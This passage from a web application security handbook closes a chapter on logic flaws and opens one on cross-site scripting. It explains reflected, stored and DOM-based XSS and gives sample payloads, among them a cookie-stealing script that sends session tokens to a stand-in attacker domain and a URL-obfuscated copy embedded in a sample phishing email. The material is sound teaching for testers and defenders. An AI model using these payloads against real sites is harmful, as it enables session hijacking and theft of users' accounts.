mal penetration testing. The conditions in which it arose came about only when

the application gained a large enough user base for random anomalies to occur,

which were reported by customers. However, a close code review of the authen-

tication and session management logic would have identified the problem.

HACK STEPS

Performing remote black-box testing for subtle thread safety issues of this kind

is not straightforward and should be regarded as a specialized undertaking,

probably necessary only in the most security-critical of applications.

■ Target selected items of key functionality, such as login mechanisms,

password change functions, and funds transfer processes.

■ For each function tested, identify a single request, or a small number of

requests, that can be used by a given user to perform a single action.

Also find the simplest means of confirming the result of the action — for

example, verifying that a given user’s login has resulted in access to their

own account information.

Continued

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 369

HACK STEPS (continued)

■ Using several high-spec machines, accessing the application from differ-

ent network locations, script an attack to perform the same action

repeatedly on behalf of several different users. Confirm whether each

action has the expected result.

■ Be prepared for a large volume of false positives. Depending on the scale

of the application’s supporting infrastructure, this activity may well

amount to a load test of the installation. Anomalies may be experienced

for reasons that have nothing to do with security.

Avoiding Logic Flaws

Just as there is no unique signature by which logic flaws in web applications

can be identified, there is also no silver bullet with which you can be protected.

For example, there is no equivalent to the straightforward advice of using a

safe alternative to a dangerous API. Nevertheless, there is a range of good

practice that can be applied to significantly reduce the risk of logical flaws

appearing within your applications:

■■

Ensure that every aspect of the application’s design is clearly docu-

mented in sufficient detail for an outsider to understand every assump-

tion made by the designer. All such assumptions should be explicitly

recorded within the design documentation.

■■

Mandate that all source code is clearly commented to include the fol-

lowing information throughout:

■■

The purpose and intended uses of each code component.

■■

The assumptions made by each component about anything that is

outside of its direct control.

■■

References to all client code which makes use of the component.

Clear documentation to this effect could have prevented the logic

flaw within the online registration functionality. (Note: “client” here

refers not to the user end of the client-server relationship but to

other code for which the component being considered is an immedi-

ate dependency.)

■■

During security-focused reviews of the application design, reflect upon

every assumption made within the design, and try to imagine circum-

stances in which each assumption might be violated. Focus particularly

on any assumed conditions that could conceivably be within the control

of application users.

370 Chapter 11 ■ Attacking Application Logic

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 370

■■

During security-focused code reviews, think laterally about two key

areas: (a) the ways in which unexpected user behavior and input will be

handled by the application, and (b) the potential side effects of any

dependencies and interoperation between different code components

and different application functions.

In relation to the specific examples of logic flaws we have described, a num-

ber of individual lessons can be learned:

■■

Be constantly aware that users control every aspect of every request

(see Chapter 1). They may access multistage functions in any sequence.

They may submit parameters that the application did not ask for. They

may omit certain parameters altogether, not just interfere with the para-

meters’ values.

■■

Drive all decisions regarding a user’s identity and status from her ses-

sion (see Chapter 8). Do not make any assumptions about the user’s

privileges on the basis of any other feature of the request, including the

fact that it occurs at all.

■■

When implementing functions that update session data on the basis of

input received from the user, or actions performed by the user, reflect

carefully on any impact that the updated data may have on other func-

tionality within the application. Be aware that unexpected side effects

may occur in entirely unrelated functionality written by a different pro-

grammer or even a different development team.

■■

If a search function is liable to index sensitive data that some users are

not authorized to access, ensure that the function does not provide any

means for those users to infer information based on search results. If

appropriate, maintain several search indexes based on different levels

of user privilege, or perform dynamic searches of information reposito-

ries with the privileges of the requesting user.

■■

Be extremely wary of implementing any functionality that enables any

user to delete items from an audit trail. Also, consider the possible

impact of a high-privileged user creating another user of the same priv-

ilege in heavily audited applications and dual-authorization models.

■■

When carrying out checks based on numeric business limits and thresh-

olds, perform strict canonicalization and data validation on all user

input before processing it. If negative numbers are not expected, explic-

itly reject requests that contain them.

■■

When implementing discounts based on order volumes, ensure that

orders are finalized before actually applying the discount.

Chapter 11 ■ Attacking Application Logic 371

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 371

■■

When escaping user-supplied data before passing to a potentially vul-

nerable application component, always be sure to escape the escape

character itself, or the entire validation mechanism may be broken.

■■

Always use appropriate storage to maintain any data that relates to an

individual user — either in the session or in the user’s profile.

Chapter Summary

Attacking an application’s logic involves a mixture of systematic probing and

lateral thinking. As we have identified, there are various key checks that you

should always carry out to test the application’s behavior in response to unex-

pected input. These include removing parameters from requests, using forced

browsing to access functions out of sequence, and submitting parameters to

different locations within the application. Often, the way an application

responds to these actions will point towards some defective assumption that

you can violate, to malicious effect.

In addition to these basic tests, the most important challenge when probing

for logic flaws is to try to get inside the mind of the developer. You need to

understand what they were trying to achieve, what assumptions they proba-

bly made, what shortcuts they are likely to have taken, and what mistakes they

may have committed. Imagine that you were working to a tight deadline, wor-

rying primarily about functionality rather than security, trying to add a new

function to an existing code base, or using poorly documented APIs written by

someone else. In that situation, what would you get wrong, and how could it

be exploited?

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. What is forced browsing, and what kind of vulnerabilities can it be

used to identify?

2. An application applies various global filters on user input, designed to

prevent different categories of attack. To defend against SQL injection, it

doubles up any single quotation marks that appear in user input. To

prevent buffer overflow attacks against some native code components,

it truncates any overlong items to a reasonable limit.

What might go wrong with these filters?

372 Chapter 11 ■ Attacking Application Logic

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 372

3. What steps could you take to probe a login function for fail-open condi-

tions? (Describe as many different tests as you can think of.)

4. A banking application implements a multistage login mechanism that is

intended to be highly robust. At the first stage, the user enters a user-

name and password. At the second stage, the user enters the changing

value on a physical token that they possess, and the original username

is resubmitted in a hidden form field.

What logic flaw should you immediately check for?

5. You are probing an application for common categories of vulnerability

by submitting crafted input. Frequently, the application returns verbose

error messages containing debugging information. Occasionally, these

messages relate to errors generated by other users. When this happens,

you are unable to reproduce the behavior a second time. What logic

flaw may this indicate, and how should you proceed?

Chapter 11 ■ Attacking Application Logic 373

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 373

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 374

375

The majority of interesting attacks against web applications involve targeting

the server-side application itself. Many of these attacks do of course impinge

upon other users — for example, an SQL injection attack that steals other

users’ data. But the essential methodology of the attacker is to interact with the

server in unexpected ways in order to perform unauthorized actions and

access unauthorized data.

The attacks described in this chapter are in a different category, because the

primary target of the attacker is the application’s other users. All of the rele-

vant vulnerabilities still exist within the server-side application. However, the

attacker leverages some aspect of the application’s behavior in order to carry

out malicious actions against another end user. These actions may result in

some of the same effects that we have already examined, such as session

hijacking, unauthorized actions, and the disclosure of personal data. They may

also result in other undesirable outcomes, such as logging of keystrokes or exe-

cution of arbitrary commands on users’ computers.

Other areas of software security have witnessed a gradual shift in focus

from server-side to client-side attacks in recent years. To take one example,

Microsoft used to announce serious security vulnerabilities within their server

products on a frequent basis. Although numerous client-side flaws were also

disclosed, these received much less attention because servers presented a

much more appealing target for most attackers. In just a few years, this situa-

tion has changed markedly. At the time of this writing, no critical security

Attacking Other Users

CHAPTER

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 375

vulnerabilities have been publicly announced in Microsoft’s IIS 6 web server.

However, in the time since this product was first released, a very large number

of flaws have been disclosed in Microsoft’s Internet Explorer browser. As the

general awareness of security threats has evolved, the front line of the battle

between software developers and hackers has moved from the server to the

client.

Although web application security is still some way behind the curve just

described, the same trend can be detected. A decade ago, most applications on

the Internet were riddled with critical flaws like command injection, which

could be easily found and exploited by any attacker with a bit of knowledge.

Although many such vulnerabilities still exist today, they are slowly becoming

less widespread and more difficult to exploit. Meanwhile, even the most

security-critical applications still contain many easily discoverable client-side

flaws. A key focus of recent research has been on this kind of vulnerability,

with defects such as session fixation first being discussed many years after

most categories of server-side bugs were widely known about. Media focus on

web security is predominantly concerned with client-side attacks, with such

terms as spyware, phishing, and Trojans being common currency to many

journalists who have never heard of SQL injection or path traversal. And

attacks against web application users are an increasingly lucrative criminal

business. Why go to the trouble of breaking into an Internet bank, when it has

10 million customers and you can compromise 1% of these in a relatively crude

attack that requires little skill or elegance?

Attacks against other application users come in many forms and manifest a

variety of subtleties and nuances that are frequently overlooked. They are also

less well understood in general than the primary server-side attacks, with dif-

ferent flaws being conflated or neglected even by some seasoned penetration

testers. We will describe all of the different vulnerabilities that are commonly

encountered and spell out the practical steps you need to perform to identify

and exploit each of these.

Cross-Site Scripting

Cross-site scripting (or XSS) is the Godfather of attacks against other users. It

is by some measure the most prevalent web application vulnerability found in

the wild, afflicting literally the vast majority of live applications, including

some of the most security-critical applications on the Internet, such as those

used by online banks.

Opinions vary as to the seriousness of XSS vulnerabilities. Ask many a

hacker or professional pen tester, and they will tell you, “Cross-site scripting is

lame.” And in one sense it is. XSS vulnerabilities are often trivial to identify

376 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 376

and are so widespread that anyone with a browser can find an XSS bug some-

where in a matter of minutes. The Bugtraq mailing list is congested with atten-

tion seekers posting XSS bugs in unheard-of software. And in plenty of cases,

XSS vulnerabilities are of minimal significance — not exploitable to do any-

thing particularly worthwhile.

In the archetypal battle between a lone hacker and a target web application,

XSS bugs usually (though not always) provide no help in the hacker’s quest to

compromise the system. Compared with a juicy bug like SQL injection, path

traversal, or broken access controls, cross-site scripting is often “lame” indeed.

However, the significance of any bug is dependent upon both its context

and the objectives of the person who might exploit it. An XSS bug in a banking

application is considerably more serious than one in a brochure-ware site.

Even if the bug does not enable a hacker to break in, it may still be gold dust to

a phisherman seeking to hoodwink millions of unwitting users.

Further, there are many situations in which XSS does represent a critical

security weakness within an application. It can often be combined with other

vulnerabilities to devastating effect. In some situations, an XSS attack can be

turned into a virus or a self-propagating worm. Attacks of this kind are cer-

tainly not lame.

XSS vulnerabilities should always be viewed in perspective, by reference to

the context in which they appear, and in relation to other serious attacks

against web applications and other computer systems. We need to treat them

seriously, but avoid getting over-excited. Whatever your opinion of the threat

posed by XSS vulnerabilities, it seems unlikely that Al Gore will be producing

a movie about them any time soon.

COMMON MYTH “You can’t own a web application via XSS.”

The authors have owned numerous applications using only XSS attacks. In the

right situation, a skillfully exploited XSS vulnerability can lead directly to a

complete compromise of the application. We will show you how.

Reflected XSS Vulnerabilities

A very common example of XSS occurs when an application employs

a dynamic page to display error messages to users. Typically, the page takes a

parameter containing the text of the message, and simply renders this text

back to the user within its response. This type of mechanism is convenient for

developers, because it allows them to invoke a customized error page from

anywhere in the application, without needing to hard-code individual mes-

sages within the error page itself.

Chapter 12 ■ Attacking Other Users 377

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 377

For example, consider the following URL, which returns the error message

shown in Figure 12-1:

https://wahh-app.com/error.php?message=Sorry%2c+an+error+occurred

Figure 12-1: A dynamically generated error message

Looking at the HTML source for the returned page, we can see that the

application is simply copying the value of the

message parameter in the URL

and inserting this into the error page template at the appropriate place:

<p>Sorry, an error occurred.</p>

This behavior of taking user-supplied input and inserting it into the HTML

of the server’s response is one of the signatures of XSS vulnerabilities, and if no

filtering or sanitization is being performed, then the application is certainly

vulnerable. Let’s see how.

The following URL has been crafted to replace the error message with a

piece of JavaScript that generates a pop-up dialog:

https://wahh-app.com/error.php?message=<script>alert(‘xss’);</script>

Requesting this URL generates an HTML page that contains the following in

place of the original message:

<p><script>alert(‘xss’);</script></p>

And sure enough, when the page is rendered within the user’s browser, the

pop-up message appears, as shown in Figure 12-2.

Figure 12-2: A proof-of-concept XSS exploit

378 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 378

Performing this simple test serves to verify two important things. First, the

contents of the

message parameter can be replaced with arbitrary data that gets

returned to the browser. Second, whatever processing the server-side applica-

tion is performing on this data (if any), it is not sufficient to prevent us from

supplying JavaScript code that is executed when the page is displayed in the

browser.

This type of simple XSS bug accounts for approximately 75% of the XSS vul-

nerabilities that exist in real-world web applications. It is often referred to as

reflected XSS because exploiting the vulnerability involves crafting a request

containing embedded JavaScript which is reflected back to any user who makes

the request. The attack payload is delivered and executed via a single request

and response. For this reason, it is also sometimes referred to as first-order XSS.

Exploiting the Vulnerability

As you will see, XSS vulnerabilities can be exploited in many different ways to

attack other users of an application. One of the simplest attacks, and the one

that is most commonly envisaged to explain the potential significance of XSS

flaws, results in the attacker capturing the session token of an authenticated

user. Hijacking the user’s session gives the attacker access to all of the data and

functionality to which the user is authorized (see Chapter 7).

The steps involved in this attack are illustrated in Figure 12-3.

Figure 12-3: The steps involved in a reflected XSS attack

Application

1. User logs in

3. User requests attacker’s URL

4. Server responds with

attacker’s JavaScript

5. Attacker’s

JavaScript

executes in

user’s browser

2. Attacker feeds crafted URL to user

6. User’s browser sends session token to attacker

7. Attacker hijacks user’s session

User Attacker

Chapter 12 ■ Attacking Other Users 379

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 379

1. The user logs in to the application as normal, and is issued with a

cookie containing a session token:

Set-Cookie: sessId=184a9138ed37374201a4c9672362f12459c2a652491a3

2. Through some means (described in detail later), the attacker feeds the

following URL to the user:

https://wahhapp.com/error.php?message=<script>var+i=new+Image;

+i.src=”http://wahh-attacker.com/“%2bdocument.cookie;</script>

As in the previous example, which generated a dialog message, this

URL contains embedded JavaScript. However, the attack payload in

this case is more malicious.

3. The user requests from the application the URL fed to them by the

attacker.

4. The server responds to the user’s request. As a result of the XSS vulner-

ability, the response contains the JavaScript created by the attacker.

5. The attacker’s JavaScript is received by the user’s browser, which

executes it in the same way it does any other code received from the

application.

6. The malicious JavaScript created by the attacker is:

var i=new Image; i.src=”http://wahh-attacker.com/“+document.cookie;

This code causes the user’s browser to make a request to wahh-

attacker.com

, which is a domain owned by the attacker. The request

contains the user’s current session token for the application:

GET /sessId=184a9138ed37374201a4c9672362f12459c2a652491a3 HTTP/1.1

Host: wahh-attacker.com

7. The attacker monitors requests to wahh-attacker.com and receives the

user’s request. He uses the captured token to hijack the user’s session,

gaining access to that user’s personal information, and performing arbi-

trary actions “as” the user.

NOTE As you saw in Chapter 6, some applications store a persistent cookie

which effectively reauthenticates the user on each visit — for example, to

implement a “remember me” function. In this situation, step 1 of the preceding

process is not necessary. The attack will succeed even at times when the target

user is not actively using or logged in to the application. Because of this,

applications that use cookies in this way leave themselves more exposed in

terms of the impact of any XSS flaws that they contain.

380 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 380

After following all of this, you may be forgiven for wondering why, if the

attacker is able to induce the user to visit a URL of his choosing, he bothers

with the whole rigmarole of transmitting his malicious JavaScript via the XSS

bug in the vulnerable application. Why doesn’t he simply host a malicious

script on

wahh-attacker.com and feed the user a direct link to this script?

Wouldn’t this script execute in just the same way as it does in the example

described?

In fact, there are two important reasons why the attacker goes to the trouble

of exploiting the XSS vulnerability. The first and most important reason is that

the attacker’s objective is not simply to execute an arbitrary script but to cap-

ture the session token of the user. Browsers do not let just any old script access

a site’s cookies; otherwise, session hijacking would be trivial. Rather, cookies

can be accessed only by the site that issued them: they are submitted in HTTP

requests back to the issuing site only, and they can be accessed via JavaScript

contained within or loaded by a page returned by that site only. Hence, if a

script residing on

wahh-attacker.com queries document.cookie, it will not

obtain the cookies issued by

wahh-app.com, and the hijacking attack will fail.

The reason why the attack which exploits the XSS vulnerability is successful

is that, as far as the user’s browser is concerned, the attacker’s malicious

JavaScript was sent to it by

wahh-app.com. When the user requests the attacker’s

URL, the browser makes a request to

https://wahh-app.com/error.php, and

the application returns a page containing some JavaScript. As with any

JavaScript received from

wahh-app.com, the browser executes this script within

the security context of the user’s relationship with

wahh-app.com. This is the

reason why the attacker’s script, although it actually originates elsewhere, is

able to gain access to the cookies issued by

wahh-app.com. This is also the rea-

son why the vulnerability itself has become known as cross-site scripting.

NOTE This restriction on the data that individual scripts can access is part of

a more general same origin policy implemented by all modern browsers. This

policy is designed to place barriers between different web sites that are being

accessed by the browser, to prevent them from interfering with each other. The

main features of the policy that you need to be aware of are:

■■

A page residing on one domain can cause an arbitrary request to be

made to another domain (for example, by submitting a form or loading

an image), but it cannot itself process the data returned from that

request.

■■

A page residing on one domain can load a script from another domain

and execute this within its own context. This is because scripts are

assumed to contain code, rather than data, and so cross-domain access

should not lead to disclosure of any sensitive information. As you will

Chapter 12 ■ Attacking Other Users 381

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 381

see, this assumption breaks down in certain situations, leading to

cross-domain attacks.

■■

A page residing on one domain cannot read or modify the cookies or

other DOM data belonging to another domain (as described in the

previous example).

The second reason why the attacker goes to the trouble of exploiting the XSS

vulnerability is that step 2 of the process just described is far likelier to succeed

if the URL crafted by the attacker starts with

wahh-app.com rather than wahh-

attacker.com

. Suppose that the attacker attempts to snare his victims by send-

ing out millions of emails like the following:

From: “WahhApp Customer Services” <[email protected]>

To: “John Smith”

Subject: Complete our customer survey and receive a $5 credit

Dear Valued Customer,

You have been selected to participate in our customer survey. Please

complete our easy 5 question survey, and in return we will credit $5 to

your account.

To access the survey, please log in to your account using your usual

bookmark, and then click on the following link:

https://wahh-app.com/%65%72%72%6f%72%2e%70%68%70?message%3d%3c%73%63

%72ipt>var+i=ne%77+Im%61ge%3b+i.s%72c=”ht%74%70%3a%2f%2f%77ahh-att

%61%63%6ber.co%6d%2f”%2bdocum%65%6e%74%2e%63ookie;</%73%63ript%3e

Many thanks and kind regards,

Wahh-App Customer Services

Even to someone who is aware of the threats posed by phishing-style scams,

this email is actually fairly reassuring:

■■

They are told to access their account using their usual bookmark.

■■

The link they are invited to click on points to the correct domain name

used by the application.

■■

The URL has been obfuscated from the version in step 2, by URL-

encoding selected characters so that its malicious intent is not immedi-

ately obvious.

■■

The HTTPS security check will succeed, because the URL provided by

the attacker is actually delivered by the authentic

wahh-app.com server.

382 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 382

If the attacker did not exploit the XSS vulnerability, but instead performed a

pure phishing attack by offering a link to his own malicious web server, many

less gullible users would suspect that it was a scam, and the attack would be

far less successful.

COMMON MYTH “Phishing scams are a fact of life on the Internet, and I

can’t do anything about them. There is no point wasting time trying to fix the

XSS bugs in my application.”

Phishing attacks and XSS vulnerabilities are entirely different phenomena. Pure

phishing scams involve creating a clone of a target application and somehow

inducing users to interact with it. XSS attacks, on the other hand, may be

delivered entirely via the vulnerable application being targeted. Many people

get confused between XSS and phishing because the methods used for delivery

are sometimes similar. However, there are several key points that make XSS a

much higher risk to organizations than phishing:

■■

Because XSS attacks execute within the authentic application, the user

will see personalized information relating to them, such as account

information or a “welcome back” message. Cloned web sites are not

personalized.

■■

The cloned web sites used in phishing attacks are usually identified

and shut down quickly.

■■

Many browsers and anti-malware products contain a phishing filter

that protects users from malicious cloned sites.

■■

Most banks won’t take responsibility if their customers visit a cloned

web site. They cannot disassociate themselves so easily if customers

are attacked via an XSS flaw in their own application.

■■

As you will see, there are ways of delivering XSS attacks that do not

use phishing-style techniques.

Stored XSS Vulnerabilities

A different category of XSS vulnerability is often referred to as stored cross-site

scripting. This version arises when data submitted by one user is stored within

the application (typically in a back-end database) and then displayed to other

users without being filtered or sanitized appropriately.

Stored XSS vulnerabilities are common in applications that support interac-

tion between end users, or where administrative staff access user records and

data within the same application. For example, consider an auction applica-

tion that allows buyers to post questions about specific items, and sellers to

Chapter 12 ■ Attacking Other Users 383

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 383

post responses. If a user can post a question containing embedded JavaScript,

and the application does not filter or sanitize this, then an attacker can post a

crafted question that causes arbitrary scripts to execute within the browser of

anyone who views the question, including both the seller and other potential

buyers. In this context, the attacker could potentially cause unwitting users to

bid on an item without intending to, or cause a seller to close an auction and

accept the attacker’s low bid for an item.

Attacks against stored XSS vulnerabilities typically involve at least two

requests to the application. In the first, the attacker posts some crafted data

containing malicious code that gets stored by the application. In the second, a

victim views some page containing the attacker’s data, at which point the

malicious code is executed. For this reason, the vulnerability is also sometimes

referred to as second-order cross-site scripting. (In this instance, “XSS” is really

a misnomer, as there is no cross-site element to the attack. The name is widely

used, however, so we will retain it here.)

Figure 12-4 illustrates how an attacker can exploit a stored XSS vulnerability

to perform the same session hijacking attack as was described for reflected XSS.

Figure 12-4: The steps involved in a stored XSS attack

There are two important differences in the attack process between reflected

and stored XSS, which make the latter generally more serious from a security

perspective.

Application

2. User logs in

3. User views attacker’s question

4. Server responds with

attacker’s JavaScript

5. Attacker’s

JavaScript

executes in

user’s browser

6. User’s browser sends session token to attacker

7. Attacker hijacks user’s session

1. Attacker submits question

containing malicious JavaScript

User Attacker

384 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 384

First, in the case of reflected XSS, to exploit a vulnerability the attacker must

use some means of inducing victims to visit his crafted URL. In the case of

stored XSS, this requirement is avoided. Having deployed his attack within

the application, the attacker simply needs to wait for victims to browse to the

page or function that has been compromised. In general, this will be a regular

page of the application that normal users will access of their own accord.

Second, the attacker’s objectives in exploiting an XSS bug are usually

achieved much more easily if the victim is using the application at the time of

the attack. For example, if the user has an existing session, this can be immedi-

ately hijacked. In a reflected XSS attack, the attacker may try to engineer this

situation by persuading the user to log in and then click on a link that he sup-

plies, or he may attempt to deploy a persistent payload that waits until the

user logs in. However, in a stored XSS attack, it is usually guaranteed that vic-

tim users will be already accessing the application at the time that the attack

strikes. Because the attack payload is stored within a page of the application

that users access of their own accord, any victim of the attack will by definition

be using the application at the moment the payload executes. Further, if the

page concerned is within the authenticated area of the application, then any

victim of the attack must in addition be logged in at the time.

These differences between reflected and stored XSS mean that stored XSS

flaws are often critical to an application’s security. In most cases, an attacker

can submit some crafted data to the application and then wait for victims to be

hit. If one of those victims is an administrator, then the attacker will have com-

promised the entire application.

Storing XSS in Uploaded Files

One common, but frequently overlooked, source of stored XSS vulnerabilities

arises where an application allows users to upload files that can be down-

loaded and viewed by other users. If you can upload an HTML or text file con-

taining JavaScript, and a victim views the file, then your payload will

normally be executed.

Many applications disallow the uploading of HTML files to prevent this

kind of attack; however, in most cases they allow files containing JPEG images.

In Internet Explorer, if a user requests a JPEG file directly (not via an embed-

ded

<img> tag), then the browser will actually process its contents as HTML if

this is what the file contains. This behavior means that an attacker can upload

a file with the

.jpg extension containing an XSS payload. If the application

does not verify that the file actually contains a valid image, and allows other

users to download the file, then it is vulnerable.

Chapter 12 ■ Attacking Other Users 385

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 385

The following shows the raw response of an application that is vulnerable to

stored XSS in this way. Note that even though the

Content-Type header speci-

fies that the message body contains an image, Internet Explorer overrides this

and handles the content as HTML because this is what it in fact contains.

HTTP/1.1 200 OK

Date: Sat, 5 May 2007 11:52:25 GMT

Server: Apache

Content-Length: 39

Content-Type: image/jpeg

This vulnerability exists in many web mail applications, where an attacker

can send emails containing a seductive-sounding image attachment that in

fact compromises the session of any user who views it. Many such applica-

tions sanitize HTML attachments specifically to block XSS attacks, but over-

look the way Internet Explorer handles JPEG files.

DOM-Based XSS Vulnerabilities

Both reflected and stored XSS vulnerabilities involve a specific pattern of

behavior, in which the application takes user-controllable data and displays

this back to users in an unsafe way. A third category of XSS vulnerabilities does

not share this characteristic. Here, the process by which the attacker’s

JavaScript gets executed is as follows:

■■

A user requests a crafted URL supplied by the attacker and containing

embedded JavaScript.

■■

The server’s response does not contain the attacker’s script in any form.

■■

When the user’s browser processes this response, the script is executed

nonetheless.

How can this series of events occur? The answer is that client-side JavaScript

can access the browser’s document object model (DOM), and so can determine

the URL used to load the current page. A script issued by the application may

extract data from the URL, perform some processing on this data, and then use

it to dynamically update the contents of the page. When an application does

this, it may be vulnerable to DOM-based XSS.

Recall the original example of a reflected XSS flaw, in which the server-side

application copies data from a URL parameter into an error message. A differ-

ent way of implementing the same functionality would be for the application

to return the same piece of static HTML on every occasion and to use client-

side JavaScript to dynamically generate the message’s contents.

386 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 386

For example, suppose that the error page returned by the application con-

tains the following:

var a = document.URL;

a = unescape(a);

document.write(a.substring(a.indexOf(“message=”) + 8, a.length));

</script>

This script parses the URL to extract the value of the message parameter and

simply writes this value into the HTML source code of the page. When

invoked as the developers intended, it can be used in the same way as in the

original example to create error messages easily. However, if an attacker crafts

a URL containing JavaScript code as the value of the

message parameter, then

this code will be dynamically written into the page and executed in just the

same way as if it had been returned by the server. In this example,

the same URL that exploited the original reflected XSS vulnerability can also

be used to produce a dialog box:

https://wahh-app.com/error.php?message=<script>alert(‘xss’);</script>

The process of exploiting a DOM-based XSS vulnerability is illustrated in

Figure 12-5.

Figure 12-5: The steps involved in a DOM-based XSS attack

Application

1. User logs in

3. User requests attacker’s URL

4. Server responds with page

containing hard-coded JavaScript

5. Attacker’s

URL is processed

by JavaScript,

triggering

his attack

payload

7. Attacker hijacks user’s session

6. User’s browser sends session token to attacker

2. Attacker feeds crafted URL to user

User Attacker

Chapter 12 ■ Attacking Other Users 387

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 387

DOM-based XSS vulnerabilities are more similar to reflected than to stored

XSS bugs. Their exploitation typically involves an attacker inducing a user to

access a crafted URL containing malicious code, and it is the server’s response

to that specific request that causes the malicious code to be executed. How-

ever, in terms of the details of exploitation, there are important differences

between reflected and DOM-based XSS, which we will examine shortly.

Real-World XSS Attacks

The features that make stored XSS vulnerabilities potentially very serious are

evident in real-world examples of exploitation in the wild.

Web mail applications are inherently at risk of stored XSS attacks, because of

the way they render email messages in-browser when viewed by the recipient.

Emails may contain HTML-formatted content, and so the application is effec-

tively copying third-party HTML into the pages that it displays to users. If an

attacker can send a victim an HTML-formatted email containing malicious

JavaScript, and if this does not get filtered or sanitized by the application, then

the victim’s web mail account may be compromised solely by reading the email.

Applications like Hotmail implement numerous filters to prevent JavaScript

embedded within emails from being transmitted to the recipient’s browser.

However, various bypasses to these filters have been discovered over the years,

enabling an attacker to construct a crafted email that succeeds in executing arbi-

trary JavaScript when viewed within the web mail application. Because any

user reading such an email is guaranteed to be logged in to the application at

the time, the vulnerability is potentially devastating to the application.

The social networking site MySpace was found to be vulnerable to a stored

XSS attack in 2005. The MySpace application implements filters to prevent

users from placing JavaScript into their user profile page. However, a user

called Samy found a means of circumventing these filters, and placed some

JavaScript into his profile page. The script executed whenever a user viewed

this profile and caused the victim’s browser to perform various actions with

two key effects. First, it added the perpetrator as a “friend” of the victim. Sec-

ond, it copied the script into the victim’s own user profile page. Subsequently,

anyone who viewed the victim’s profile would also fall victim to the attack. To

perform the various requests required, the attack used Ajax techniques (see the

“Ajax” sidebar at the end of this section). The result was an XSS-based worm

that spread exponentially, and within hours the original perpetrator had

nearly one million friend requests, as shown in Figure 12-6.

As a result, MySpace was obliged to take the application offline, remove the

malicious script from the profiles of all their users, and fix the defect in their

388 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 388

anti-XSS filters. The perpetrator was eventually forced to pay financial restitu-

tion to MySpace and to carry out three months of community service, without

the help of his many friends.

Figure 12-6: Samy’s friends

AJAX

Ajax (or Asynchronous JavaScript and XML) is a technology used by some

applications to create an enhanced interactive experience for users. In most

web applications, each user action (such as clicking a link or submitting a form)

results in a new HTML page being loaded from the server. The entire browser

content disappears and is replaced with new content, even if much of this is

identical to what was there before. This way of operating creates a punctuated

user experience and differs greatly from the behavior of local applications such

as email clients and other office software.

Continued

Chapter 12 ■ Attacking Other Users 389

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 389

390 Chapter 12 ■ Attacking Other Users

AJAX (continued)

Ajax enables web developers to implement a user interface whose behavior

is much closer to that of local software. User actions may still trigger a round

trip of request and response to the server; however, the entire web page is not

reloaded each time this occurs. Rather, the request does not occur as a browser

navigation event but is made asynchronously by client-side JavaScript. The

server responds with a lightweight message containing information in XML,

JSON, or any other format, which is processed by the client-side script and used

to update the user interface accordingly. For example, in a shopping applica-

tion, clicking the Add to Basket button may simply involve communicating this

action to the server and updating the “Your basket contains X items” message

at the top of the screen. The page itself is not reloaded, resulting in a much

smoother and more satisfying experience for the user.

Ajax is implemented using the XMLHttpRequest object. This object comes in

several forms depending on the browser, but these all function in fundamen-

tally the same way. The following is a simple example of using Ajax within

Internet Explorer to issue an asynchronous request and process its response:

var request = new ActiveXObject(“Microsoft.XMLHTTP”);

request.open(“GET”, “https://wahh-app.com/foo”, false);

request.send();

alert(request.responseText);

</script>

One very important proviso affecting the use of XMLHttpRequest is that it

can only be used to issue requests to the same domain as the page that is

invoking it. Without this restriction, Ajax could be used to trivially violate the

browser’s same origin policy, by enabling applications to retrieve and process

data from a different domain.

Chaining XSS and Other Attacks

XSS flaws can sometimes be chained with other vulnerabilities to devastating

effect. The authors encountered an application that had a stored XSS vulnera-

bility within the user’s display name. The only purpose for which this item

was used was to show a personalized welcome message after the user logged

in. The display name was never displayed to other application users, so there

initially appeared to be no attack vector for users to cause problems by editing

their own display name. Other things being equal, the vulnerability would be

classified as very low risk.

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 390

However, a second vulnerability existed within the application. Defective

access controls meant that any user could edit the display name of any other

user. Again, on its own, this issue had minimal significance: Why would an

attacker be interested in changing the display name of other users?

Chaining these two low-risk vulnerabilities together enabled an attacker to

completely compromise the application. It was trivial to automate an attack

to inject a script into the display name of every application user. This script

executed every time a user logged in to the application, and transmitted the

user’s session token to a server owned by the attacker. Some of the applica-

tion’s users were administrators, who logged in frequently and had the abil-

ity to create new users and modify the privileges of other users. An attacker

simply had to wait for an administrator to log in, hijack the administrator’s

session, and then upgrade their own account to have administrative privi-

leges. The two vulnerabilities together represented a critical risk to the secu-

rity of the application.

COMMON MYTH “We’re not worried about that low-risk XSS bug — a user

could only exploit it to attack themselves.”

As the example illustrates, even apparently low-risk vulnerabilities can in the

right circumstances pave the way for a devastating attack. Taking a defense-

in-depth approach to security entails removing every known vulnerability,

however insignificant it may seem. Always assume that an attacker will be

more imaginative than you in devising ways to exploit minor bugs!

Payloads for XSS Attacks

So far, we have focused on the classic XSS attack payload, which is to capture

a victim’s session token, hijack their session, and thereby make use of the

application “as” the victim, performing arbitrary actions and potentially tak-

ing ownership of that user’s account. In fact, there are numerous other attack

payloads that may be delivered via any type of XSS vulnerability.

Virtual Defacement

